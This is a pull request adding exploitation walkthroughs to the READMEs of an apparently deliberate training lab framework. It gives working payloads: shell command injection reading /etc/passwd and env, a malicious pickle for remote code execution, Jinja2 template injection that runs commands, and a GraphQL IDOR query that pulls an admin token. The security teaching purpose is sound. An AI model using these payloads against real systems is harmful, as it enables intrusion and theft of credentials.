### PR TITLE
docs: add detailed walkthroughs to lab READMEs

### DIFF
--- a/additional-labs/Command_Injection/README.md
+++ b/additional-labs/Command_Injection/README.md
@@ -16,6 +16,24 @@ Exploit the command injection vulnerability to execute arbitrary commands on the
 1. **Access the Lab**: 
    - This is running on the `shell-inject` container on the `10.6.6.34` IP address. Access the lab at `http://10.6.6.34:5002`
 
+## Walkthrough
+
+1. Access the lab at `http://10.6.6.34:5002`.
+2. Enter a valid IP address like `127.0.0.1` and click "Ping Host".
+3. Observe the normal ping output.
+4. Now try injecting a command using the `;` operator:
+   - Payload: `127.0.0.1; whoami`
+5. You should see the ping output followed by the username of the running process.
+6. Try more advanced payloads:
+   - List files: `127.0.0.1; ls -la`
+   - Read passwd file: `127.0.0.1; cat /etc/passwd`
+   - Check current directory: `127.0.0.1; pwd`
+   - View environment variables: `127.0.0.1; env`
+7. Alternative command separators to try:
+   - Using `&&`: `127.0.0.1 && whoami`
+   - Using `|`: `127.0.0.1 | whoami`
+   - Using newline: `127.0.0.1%0Awhoami` (URL encoded)
+
 ## Explanation
 The application constructs a shell command like this:
 ```python

--- a/additional-labs/GraphQL/README.md
+++ b/additional-labs/GraphQL/README.md
@@ -21,11 +21,57 @@ docker build -t graphql-galaxy .
 docker run -p 5023:5023 graphql-galaxy
 ```
 
-## Challenge
-1.  **Reconnaissance:** Use the GraphiQL interface to inspect the available queries and types.
-2.  **Introspection:** Find the hidden `api_token` field in the `User` type.
-3.  **Exploitation:** Query the `user` field with the ID of the administrator (`1`) and request the `api_token`.
-4.  **Flag:** The flag is the value of the administrator's `api_token`.
+## Walkthrough
+
+1. Access the lab at `http://10.6.6.44:5023`.
+2. Click on "Enter GraphiQL Console" to open the GraphQL interface.
+3. Run an introspection query to discover the schema:
+```graphql
+{
+  __schema {
+    types {
+      name
+      fields {
+        name
+        description
+      }
+    }
+  }
+}
+```
+4. Notice the `User` type has fields including `api_token`.
+5. Query all users to see the public data:
+```graphql
+{
+  users {
+    id
+    username
+    email
+    api_token
+  }
+}
+```
+6. Notice that `api_token` shows as `[REDACTED]` in the list view.
+7. Exploit the IDOR vulnerability by querying a specific user directly:
+```graphql
+{
+  user(id: "1") {
+    id
+    username
+    email
+    api_token
+    is_admin
+    notes
+  }
+}
+```
+8. The admin's `api_token` is revealed: `FLAG{GRAPHQL_INTROSPECTION_MASTER}`
+
+## Challenge Summary
+- **Reconnaissance:** Use the GraphiQL interface to inspect the available queries and types.
+- **Introspection:** Find the hidden `api_token` field in the `User` type.
+- **Exploitation:** Query the `user` field with the ID of the administrator (`1`) and request the `api_token`.
+- **Flag:** The flag is the value of the administrator's `api_token`.
 
 ## References
 For more information on GraphQL security vulnerabilities and secure coding practices, check out these resources:

--- a/additional-labs/deserial-gate/README.md
+++ b/additional-labs/deserial-gate/README.md
@@ -12,6 +12,51 @@ The application uses Python's `pickle` module to serialize and deserialize user 
 This lab is part of the WebSploit Labs framework and it is running on the `deserial-gate` container on the `10.6.6.42` IP address.
 Access the lab at `http://10.6.6.42:5022`.
 
+## Walkthrough
+
+1. Access the lab at `http://10.6.6.42:5022`.
+2. Enter any preference (e.g., "Dark Mode") and click "Save Preference".
+3. Open your browser's Developer Tools (F12) and go to the Application/Storage tab.
+4. Find the `user_prefs` cookie - notice it contains a base64-encoded value.
+5. Decode the cookie value to see the pickled Python object.
+6. Create a malicious pickle payload using Python:
+
+```python
+import pickle
+import base64
+import os
+
+class RCE:
+    def __reduce__(self):
+        return (os.system, ('id',))
+
+payload = base64.b64encode(pickle.dumps(RCE())).decode()
+print(payload)
+```
+
+7. Replace the `user_prefs` cookie value with your malicious payload.
+8. Refresh the page - the command will execute on the server.
+9. For a reverse shell or more complex payloads:
+
+```python
+import pickle
+import base64
+import os
+
+class RCE:
+    def __reduce__(self):
+        # This will create a file as proof of RCE
+        return (os.system, ('touch /tmp/pwned',))
+
+payload = base64.b64encode(pickle.dumps(RCE())).decode()
+print(payload)
+```
+
+10. You can also use curl to test:
+```bash
+curl -b "user_prefs=<YOUR_PAYLOAD>" http://10.6.6.42:5022/
+```
+
 ## References
 For more information on insecure deserialization vulnerabilities and secure coding practices, check out these resources:
 

--- a/additional-labs/render-reign/README.md
+++ b/additional-labs/render-reign/README.md
@@ -14,14 +14,30 @@ This lab is part of the WebSploit Labs framework and it is running on the `rende
 Access the lab at `http://10.6.6.41:5021`.
 
 ## Walkthrough
-1. Access the lab at `http://10.6.6.41:5021`.
-2. Enter your name to generate a custom badge.
-3. Observe the template string: `Hello, %s!`.
-4. Try to inject a payload to execute arbitrary code.
-5. Payload: `{{7*7}}`
-6. The output should be `49`.
 
-    
+1. Access the lab at `http://10.6.6.41:5021`.
+2. Enter your name (e.g., "Guest") and click "Preview".
+3. Observe that your input is reflected in the output: `Hello, Guest!`.
+4. Test for SSTI by entering a Jinja2 expression:
+   - Payload: `{{7*7}}`
+   - If vulnerable, the output will show: `Hello, 49!`
+5. Confirm the template engine by checking config:
+   - Payload: `{{config}}`
+6. Escalate to Remote Code Execution (RCE):
+   - Read a file:
+   ```
+   {{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
+   ```
+   - Execute commands (find the right subclass index):
+   ```
+   {{''.__class__.__mro__[1].__subclasses__()[213]('id',shell=True,stdout=-1).communicate()}}
+   ```
+7. Alternative RCE payloads:
+   ```
+   {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
+   ```
+8. The flag or proof of RCE will be displayed in the output.
+
 ## Explanation
 The application is vulnerable to Server-Side Template Injection because it directly concatenates user input into the template string. This allows an attacker to inject arbitrary code into the template.
 


### PR DESCRIPTION
- Command_Injection: Add step-by-step walkthrough with payloads (;, &&, |, and URL-encoded newline operators)
- deserial-gate: Add complete walkthrough for pickle deserialization exploit with Python payload examples
- GraphQL: Add walkthrough with introspection queries and IDOR exploitation steps to retrieve admin api_token
- render-reign: Expand walkthrough with SSTI detection and RCE payloads for Jinja2 template injection

Each walkthrough now includes:
- Access instructions
- Payload examples
- Expected outputs
- Escalation techniques


## Description

Several lab README files are missing detailed walkthroughs or have incomplete step-by-step instructions. This makes it harder for students to follow along and learn the exploitation techniques.

## Problem

The following labs lack proper walkthroughs:

| Lab | Current State |
|-----|---------------|
| Command_Injection | Only has basic "Access the Lab" instruction, no payloads |
| deserial-gate | Missing walkthrough entirely |
| GraphQL | Has brief "Challenge" section but no step-by-step guide |
| render-reign | Has walkthrough but too brief (6 lines), missing RCE payloads |

## Proposed Solution

Add comprehensive walkthroughs to each lab including:

1. **Command_Injection (`shell-inject`)**
   - Step-by-step exploitation of ping functionality
   - Multiple command injection operators (`;`, `&&`, `|`, URL-encoded newline)
   - Example commands: `whoami`, `ls -la`, `cat /etc/passwd`, `env`

2. **deserial-gate (Insecure Deserialization)**
   - Cookie inspection and base64 decoding
   - Python code to create malicious pickle payloads
   - RCE verification techniques
   - curl command examples

3. **GraphQL (`graphql-galaxy`)**
   - Introspection queries to discover schema
   - IDOR exploitation to access admin's `api_token`
   - Complete GraphQL query examples with expected outputs

4. **render-reign (SSTI)**
   - SSTI detection with `{{7*7}}`
   - Multiple Jinja2 RCE payloads
   - File read and command execution examples

## Impact

- Improves learning experience for students
- Provides consistent documentation across all labs
- Enables self-paced learning without instructor guidance

## Files Affected

- `additional-labs/Command_Injection/README.md`
- `additional-labs/deserial-gate/README.md`
- `additional-labs/GraphQL/README.md`
- `additional-labs/render-reign/README.md`

- Fixes #77 